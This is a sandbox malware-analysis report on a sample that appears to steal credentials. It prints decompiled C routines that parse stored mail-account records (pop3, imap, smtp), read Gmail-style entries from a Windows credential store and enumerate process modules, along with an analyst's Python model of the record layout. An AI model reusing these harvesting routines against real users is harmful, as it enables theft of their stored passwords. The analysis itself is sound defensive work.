                                                                                                                                                                         • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 2300387033-3849865405
                                                                                                                                                                        • Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                        • Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                         			E004044E4(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                         				/* Builds one normalised mail-account entry from the raw record at _a4 and
                                                                                                                                                                         				   appends it to a list owned by the object in __ecx. The record offsets read
                                                                                                                                                                         				   below are the only layout information recovered here; the local names are
                                                                                                                                                                         				   the decompiler's. */
                                                                                                                                                                         				intOrPtr _v8;
                                                                                                                                                                         				intOrPtr _v20;
                                                                                                                                                                         				intOrPtr _v24;
                                                                                                                                                                         				char _v280;
                                                                                                                                                                         				char _v408;
                                                                                                                                                                         				intOrPtr _v412;
                                                                                                                                                                         				char _v668;
                                                                                                                                                                         				char _v796;
                                                                                                                                                                         				intOrPtr _v800;
                                                                                                                                                                         				char _v928;
                                                                                                                                                                         				char _v940;
                                                                                                                                                                         				void* __ebx;
                                                                                                                                                                         				void* __edi;
                                                                                                                                                                         				void* __esi;
                                                                                                                                                                         				void* _t37;
                                                                                                                                                                         				void* _t44;
                                                                                                                                                                         				intOrPtr _t50;
                                                                                                                                                                         				void* _t56;
                                                                                                                                                                         				intOrPtr _t58;
                                                                                                                                                                         				void* _t63;
                                                                                                                                                                         
                                                                                                                                                                         				_t63 = __fp0;
                                                                                                                                                                         				_t50 = __ecx;
                                                                                                                                                                         				_v8 = __ecx;
                                                                                                                                                                         				E00402197( &_v940);                              /* initialise the output entry on the stack */
                                                                                                                                                                         				_t58 = _a4;                                      /* _t58 = raw account record */
                                                                                                                                                                         				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                                                                                                                                         				_push(_t58 + 0x404);
                                                                                                                                                                         				_t44 = 0x7f;                                     /* per-string copy bound; E004060DA is strlen + memcpy (see APIs) */
                                                                                                                                                                         				E004060DA(_t44,  &_v796);                        /* src = record + 0x404, pushed above */
                                                                                                                                                                         				E004060DA(_t44,  &_v408, _t58 + 0x204);
                                                                                                                                                                         				E004060DA(_t44,  &_v928, _t58 + 4);
                                                                                                                                                                         				E004060DA(_t44,  &_v668, _t58 + 0x104);
                                                                                                                                                                         				_t37 = E004060DA(_t44,  &_v280, _t58 + 0x304);
                                                                                                                                                                         				_t56 = _t58 + 0x504;                             /* protocol name string */
                                                                                                                                                                         				/* L00412072 is _stricmp (APIs, refs 00404575 / 00404593). The decompiler did
                                                                                                                                                                         				   not pick up its return value, so each "_t37" test below is really a test of
                                                                                                                                                                         				   the _stricmp result in eax: 0 means the protocol name matched. */
                                                                                                                                                                         				_push("pop3");
                                                                                                                                                                         				_push(_t56);
                                                                                                                                                                         				L00412072();
                                                                                                                                                                         				if(_t37 != 0) {                                  /* not "pop3" */
                                                                                                                                                                         					_push("imap");
                                                                                                                                                                         					_push(_t56);
                                                                                                                                                                         					L00412072();
                                                                                                                                                                         					if(_t37 != 0) {                              /* not "imap" */
                                                                                                                                                                         						_push("smtp");
                                                                                                                                                                         						_push(_t56);
                                                                                                                                                                         						L00412072();
                                                                                                                                                                         						if(_t37 == 0) {
                                                                                                                                                                         							_v412 = 4;                           /* smtp; any other name leaves _v412 unassigned here */
                                                                                                                                                                         						}
                                                                                                                                                                         					} else {
                                                                                                                                                                         						_v412 = 2;                               /* imap */
                                                                                                                                                                         					}
                                                                                                                                                                         				} else {
                                                                                                                                                                         					_v412 = 1;                                   /* pop3 */
                                                                                                                                                                         				}
                                                                                                                                                                         				_v24 =  *((intOrPtr*)(_t58 + 0x804));           /* two trailing dwords copied verbatim */
                                                                                                                                                                         				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                                                                                                                                         				return E004023C6( &_v940, _t63, _v8 + 0xfffffe38);   /* append the entry to the list at this - 0x1c8 */
                                                                                                                                                                         			}

                                                                                                                                                                         Instruction addresses for the C code above (one per statement line, in order): 0x004044e4 0x004044f0 0x004044f8 0x004044fb 0x00404506 0x00404509 0x00404515 0x00404518 0x0040451f 0x00404531 0x00404540 0x00404552 0x00404564 0x00404569 0x0040456f 0x00404574 0x00404575 0x0040457f 0x0040458d 0x00404592 0x00404593 0x0040459c 0x004045aa 0x004045af 0x004045b0 0x004045b9 0x004045bb 0x004045bb 0x0040459e 0x0040459e 0x0040459e 0x00404581 0x00404581 0x00404581 0x004045cb 0x004045d4 0x004045ef

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
                                                                                                                                                                        • _stricmp.MSVCRT(?,imap), ref: 00404593
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp$memcpystrlen
                                                                                                                                                                        • String ID: imap$pop3$smtp
                                                                                                                                                                        • API String ID: 445763297-821077329
                                                                                                                                                                        • Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                        • Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
                                                                                                                                                                        • Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                        • Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
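The function above reads an account record purely by fixed offset and maps its protocol string to a small code. The Python below is an added analyst model of that logic (not code from the sample or from this Joe Sandbox report) for checking entries recovered from the memory dump against the layout the decompilation implies. It assumes a flat 0x80C-byte record with NUL-terminated strings at the offsets E004060DA reads, that E004060DA copies at most 0x7f bytes, and it uses placeholder field names keyed by offset because the binary provides none. The sample record is constructed inline so the script runs offline.

```python
"""Analyst model of E004044E4, the account-record classifier decompiled above.

Added example, not code from the sample or from the sandbox report.
Assumptions: flat 0x80C-byte record, NUL-terminated strings at the offsets
the decompilation reads, E004060DA copies at most 0x7f bytes, and the field
names below are placeholders keyed by offset (the binary names none).
"""
import struct

COPY_MAX = 0x7F          # E004060DA(0x7f, dst, src): strlen + memcpy, assumed capped at 0x7f
REC_SIZE = 0x80C         # the last read is the dword at +0x808

# String fields copied by E004060DA, keyed by record offset (names are placeholders).
STRING_FIELDS = [
    ("str_0004", 0x004),
    ("str_0104", 0x104),
    ("str_0204", 0x204),
    ("str_0304", 0x304),
    ("str_0404", 0x404),
]
PROTO_OFF = 0x504        # string handed to _stricmp against "pop3" / "imap" / "smtp"
DWORDS_OFF = 0x804       # two dwords copied verbatim (+0x804, +0x808)

# _v412 values assigned by the three branches of the _stricmp chain.
PROTO_CODE = {"pop3": 1, "imap": 2, "smtp": 4}


def bounded_cstr(buf, off, limit=COPY_MAX):
    """Read the NUL-terminated string at `off`, truncated to `limit` bytes
    the way a strlen/memcpy pair with a fixed cap would truncate it."""
    end = buf.find(b"\x00", off)
    if end < 0:
        end = len(buf)               # unterminated: take what is there
    return bytes(buf[off:min(end, off + limit)]).decode("latin-1")


def classify_protocol(name):
    """Case-insensitive match like _stricmp; None when no branch assigns _v412."""
    return PROTO_CODE.get(name.lower())


def parse_record(buf):
    """Turn one raw record into the normalised entry E004044E4 builds."""
    if len(buf) < REC_SIZE:
        raise ValueError("record shorter than 0x%x bytes" % REC_SIZE)
    entry = {name: bounded_cstr(buf, off) for name, off in STRING_FIELDS}
    proto = bounded_cstr(buf, PROTO_OFF)
    entry["protocol"] = proto
    entry["protocol_code"] = classify_protocol(proto)
    entry["dword_0804"], entry["dword_0808"] = struct.unpack_from("<II", buf, DWORDS_OFF)
    return entry


def build_record(strings, protocol, dword_a, dword_b):
    """Constructed sample record in the layout above (test data, not a real dump)."""
    buf = bytearray(REC_SIZE)
    for (_, off), value in zip(STRING_FIELDS, strings):
        buf[off:off + len(value)] = value
    buf[PROTO_OFF:PROTO_OFF + len(protocol)] = protocol
    struct.pack_into("<II", buf, DWORDS_OFF, dword_a, dword_b)
    return bytes(buf)


if __name__ == "__main__":
    # Constructed sample: an IMAP entry with placeholder host and user.
    sample = build_record(
        [b"mail.example.net", b"user@example.net", b"s3cret", b"", b""],
        b"IMAP", 993, 1)
    print(parse_record(sample))
```

Two properties of the original fall out of the model: the protocol comparison is case-insensitive, so "IMAP" and "imap" classify the same, and any value longer than 0x7f bytes is silently cut, so a credential recovered from the dump may be shorter than what the victim's client stored.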

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                         			E004036A6(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                         				/* Fetches entry _a4 from the structure at __edi + 0x87c, splits it at the
                                                                                                                                                                         				   first ':' and copies the two halves into fixed-size stack buffers. The
                                                                                                                                                                         				   listing below is cut off after the length check. */
                                                                                                                                                                         				char _v5;
                                                                                                                                                                         				char _v132;
                                                                                                                                                                         				char _v404;
                                                                                                                                                                         				char _v532;
                                                                                                                                                                         				intOrPtr _v536;
                                                                                                                                                                         				char _v920;
                                                                                                                                                                         				intOrPtr _v924;
                                                                                                                                                                         				char _v1052;
                                                                                                                                                                         				char _v1064;
                                                                                                                                                                         				void* __ebx;
                                                                                                                                                                         				void* _t18;
                                                                                                                                                                         				char* _t20;
                                                                                                                                                                         				char* _t39;
                                                                                                                                                                         				char* _t41;
                                                                                                                                                                         				void* _t48;
                                                                                                                                                                         				void* _t59;
                                                                                                                                                                         
                                                                                                                                                                         				_t59 = __fp0;
                                                                                                                                                                         				_t48 = __edi;
                                                                                                                                                                         				if( *((intOrPtr*)(__edi + 0x888)) == 0) {      /* nothing to read: return with eax untouched (_t18 is never assigned) */
                                                                                                                                                                         					return _t18;
                                                                                                                                                                         				}
                                                                                                                                                                         				_t39 =  &_v132;                                  /* 128-byte buffer that receives the entry */
                                                                                                                                                                         				_t20 = E0040EF77(_t39, __edi + 0x87c, _a4);
                                                                                                                                                                         				if(_t20 != 0) {
                                                                                                                                                                         					_v5 = 0;
                                                                                                                                                                         					_t20 = strchr(_t39, 0x3a);                   /* 0x3a == ':' */
                                                                                                                                                                         					_t41 = _t20;
                                                                                                                                                                         					if(_t41 != 0) {
                                                                                                                                                                         						 *_t41 = 0;                              /* terminate the left half at the ':' */
                                                                                                                                                                         						E00402197( &_v1064);                     /* initialise the output entry, as in E004044E4 */
                                                                                                                                                                         						strcpy( &_v404,  &(_t41[1]));            /* right half (after ':') */
                                                                                                                                                                         						strcpy( &_v532,  &_v132);                /* left half (before ':') */
                                                                                                                                                                         						_v924 = 7;
                                                                                                                                                                         						_v536 = 3;
                                                                                                                                                                         						if(strlen( &_v532) + 0xa < 0x7f) {       /* room for 10 more bytes within the 0x7f bound */
                                                                                                                                                                        							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                                                                                                                        						}
                                                                                                                                                                        						strcpy( &_v1052,  &_v532);
                                                                                                                                                                        						_t20 = E004023C6( &_v1064, _t59, _t48);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t20;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                          • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                          • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                          • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                        • strchr.MSVCRT ref: 004036E0
                                                                                                                                                                        • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                                                                                                                                                                        • strlen.MSVCRT ref: 00403739
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040375D
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00403773
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                        • String ID: %s@gmail.com
                                                                                                                                                                        • API String ID: 2649369358-4097000612
                                                                                                                                                                        • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                        • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                                                                                                                                                                        • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040687C(char* __ebx, intOrPtr _a4, int _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void _v1031;
                                                                                                                                                                        				void _v1032;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				char* _t27;
                                                                                                                                                                        				int _t32;
                                                                                                                                                                        				int _t38;
                                                                                                                                                                        				char* _t43;
                                                                                                                                                                        				int _t44;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        				void** _t48;
                                                                                                                                                                        				void* _t50;
                                                                                                                                                                        				void* _t51;
                                                                                                                                                                        
                                                                                                                                                                        				_t43 = __ebx;
                                                                                                                                                                        				_t44 = 0;
                                                                                                                                                                        				_v1032 = 0;
                                                                                                                                                                        				memset( &_v1031, 0, 0x3ff);
                                                                                                                                                                        				_t26 = _a8;
                                                                                                                                                                        				_t51 = _t50 + 0xc;
                                                                                                                                                                        				 *__ebx = 0;
                                                                                                                                                                        				if(_t26 > 0) {
                                                                                                                                                                        					_t48 = _a4 + 4;
                                                                                                                                                                        					_v8 = _t26;
                                                                                                                                                                        					do {
                                                                                                                                                                        						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                                                                                                                                        						_t32 = strlen( &_v1032);
                                                                                                                                                                        						_a8 = _t32;
                                                                                                                                                                        						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                                                                                                                                        						_t45 = _t44 + _a8 + 1;
                                                                                                                                                                        						_t38 = strlen( *_t48);
                                                                                                                                                                        						_a8 = _t38;
                                                                                                                                                                        						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                                                                                                                                        						_t51 = _t51 + 0x30;
                                                                                                                                                                        						_t48 =  &(_t48[2]);
                                                                                                                                                                        						_t18 =  &_v8;
                                                                                                                                                                        						 *_t18 = _v8 - 1;
                                                                                                                                                                        						_t44 = _t45 + _a8 + 1;
                                                                                                                                                                        					} while ( *_t18 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t27 = _t44 + _t43;
                                                                                                                                                                        				 *_t27 = 0;
                                                                                                                                                                        				 *((char*)(_t27 + 1)) = 0;
                                                                                                                                                                        				return _t43;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
• Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
• Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
• Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
• Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 25%
E0040EF77(void* __ebx, int _a4, void* _a8) {
    char _v20;
    char _v36;
    char _v52;
    void* _t15;
    void* _t17;
    void* _t28;
    intOrPtr* _t31;
    int _t32;

    _t28 = __ebx;
    _t31 = __imp__UuidFromStringA;
    _t15 = *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff", &_v36);
    _t17 = *_t31("00000000-0000-0000-0000-000000000000", &_v20);
    if(_t15 != 0 || _t17 != 0 || E0040EF3B(&_v52, _a4, &_v36, &_v20, _a8, &_a4, &_a8) != 0) {
        return 0;
    } else {
        _t32 = _a4;
        if(_t32 > 0x7e) {
            _t32 = 0x7e;
        }
        memcpy(_t28, _a8, _t32);
        *((char*)(_t28 + _t32)) = 0;
        __imp__CoTaskMemFree(_a8);
        return 1;
    }
}

APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
• memcpy.MSVCRT ref: 0040EFD7
• CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
Strings
• 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 1640410171-3316789007
• Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
• Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
• Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
• Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00409F9C(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

    *__edi = *__edi + __ecx;
}

APIs
  • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
  • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
• ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
• LoadIconA.USER32(000000CE), ref: 00409FE7
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
• LoadIconA.USER32(000000CF), ref: 0040A005
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
• SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
• String ID:
• API String ID: 3673709545-0
• Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
• Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
• Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
• Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00409F9D(void* __eax, void* __ecx, intOrPtr* __edi) {

    *__edi = *__edi + __ecx;
}

APIs
  • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
  • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
• ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
• LoadIconA.USER32(000000CE), ref: 00409FE7
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
• LoadIconA.USER32(000000CF), ref: 0040A005
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
• SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
• String ID:
• API String ID: 3673709545-0
• Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
• Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
• Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
• Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00407E74(void* __eflags, struct HWND__* _a4) {
    void _v4103;
    char _v4104;
    void* _t8;
    void* _t17;
    intOrPtr _t21;    /* was used without a declaration in the decompiler output */

    _t8 = E00412360(0x1004, _t17);
    _t21 = *0x4181b8;
    if(*0x4181b8 != 0) {
        /* zero a 0x1001-byte stack buffer before filling it with the caption */
        _v4104 = 0;
        memset(&_v4103, 0, 0x1000);
        sprintf(0x4182c0, "dialog_%d", *0x418300);
        if(E00407F4F(_t17, _t21, "caption", &_v4104) != 0) {
            SetWindowTextA(_a4, &_v4104);
        }
        return EnumChildWindows(_a4, E00407E17, 0);
    }
    return _t8;
}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00407E9F
                                                                                                                                                                        • sprintf.MSVCRT ref: 00407EB4
                                                                                                                                                                          • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                                                                                                                                                                          • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                                                                                                                                                                          • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                                                                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00407EDB
                                                                                                                                                                        • EnumChildWindows.USER32 ref: 00407EEB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                                        • String ID: caption$dialog_%d
                                                                                                                                                                        • API String ID: 246480800-4161923789
                                                                                                                                                                        • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                        • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 35%
			// Enumerates the modules loaded in process _a4 and hands each one, as a
			// 0x118-byte record, to the callback E0040EAD0(_a8, &record) until the
			// callback returns 0; returns 1 if an enumeration was started, else 0.
			// Two code paths exist, selected by E004062A6() and the globals at
			// 0x418518 / 0x418514 (what those checks test is not shown in this report).
			// The import pointers at 0x417fd4..0x417fe8 are not named in the report;
			// the API names in the comments below are inferred from the argument
			// values (TH32CS_SNAPMODULE = 8, sizeof(MODULEENTRY32) = 0x224,
			// MAX_PATH = 0x104, sizeof(MODULEINFO) = 0xc) and are an interpretation.
			E0040E8C6(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;            // process handle (PSAPI path) or snapshot handle (Toolhelp path)
				signed int _v12;      // PSAPI path: index into the HMODULE array
				unsigned int _v16;    // PSAPI path: bytes needed, then module count
				int _v20;             // return value
				intOrPtr _v28;        // MODULEINFO.SizeOfImage
				char _v32;            // MODULEINFO.lpBaseOfDll (struct start, 0xc bytes)
				intOrPtr _v40;        // record: module base address
				intOrPtr _v44;        // record: module size
				char _v308;           // record: module path
				intOrPtr _v312;       // record: HMODULE
				void _v316;           // record (0x118 bytes): process id
				void _v579;
				char _v580;           // path buffer, 0x104 (MAX_PATH) bytes
				char _v844;           // MODULEENTRY32.szExePath
				intOrPtr _v1104;      // MODULEENTRY32.hModule
				intOrPtr _v1108;      // MODULEENTRY32.modBaseSize
				intOrPtr _v1112;      // MODULEENTRY32.modBaseAddr
				char _v1132;          // MODULEENTRY32.dwSize (struct start, 0x224 bytes)
				char _v17516;         // HMODULE array for EnumProcessModules, 0x4000 bytes
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E00412360(0x446c, __ecx);                                  // stack probe for the 0x446c-byte frame
				_t102 = 0;
				_v20 = 0;
				if(E004062A6() == 0 ||  *0x418518 == 0) {                // Toolhelp path unless E004062A6() and the flag at 0x418518 are both non-zero
					if( *0x418514 != _t102) {                             // second global flag gates the Toolhelp path
						_t94 = _a4;
						_t63 =  *0x417fe0(8, _t94);                        // CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid) (inferred)
						_v8 = _t63;
						if(_t63 != 0xffffffff) {                           // INVALID_HANDLE_VALUE
							_v20 = 1;
							_v1132 = 0x224;                                // me.dwSize = sizeof(MODULEENTRY32)
							_t64 =  *0x417fd8(_t63,  &_v1132);             // Module32First(hSnap, &me) (inferred)
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);             // zero the record
								_v312 = _v1104;                            // record.hModule = me.hModule
								_v316 = _t94;                              // record.pid = pid
								strcpy( &_v308,  &_v844);                  // record.path = me.szExePath
								_v44 = _v1108;                             // record.size = me.modBaseSize
								_t107 = _t107 + 0x14;                      // caller cleans up the cdecl memset/strcpy arguments
								_v40 = _v1112;                             // record.base = me.modBaseAddr
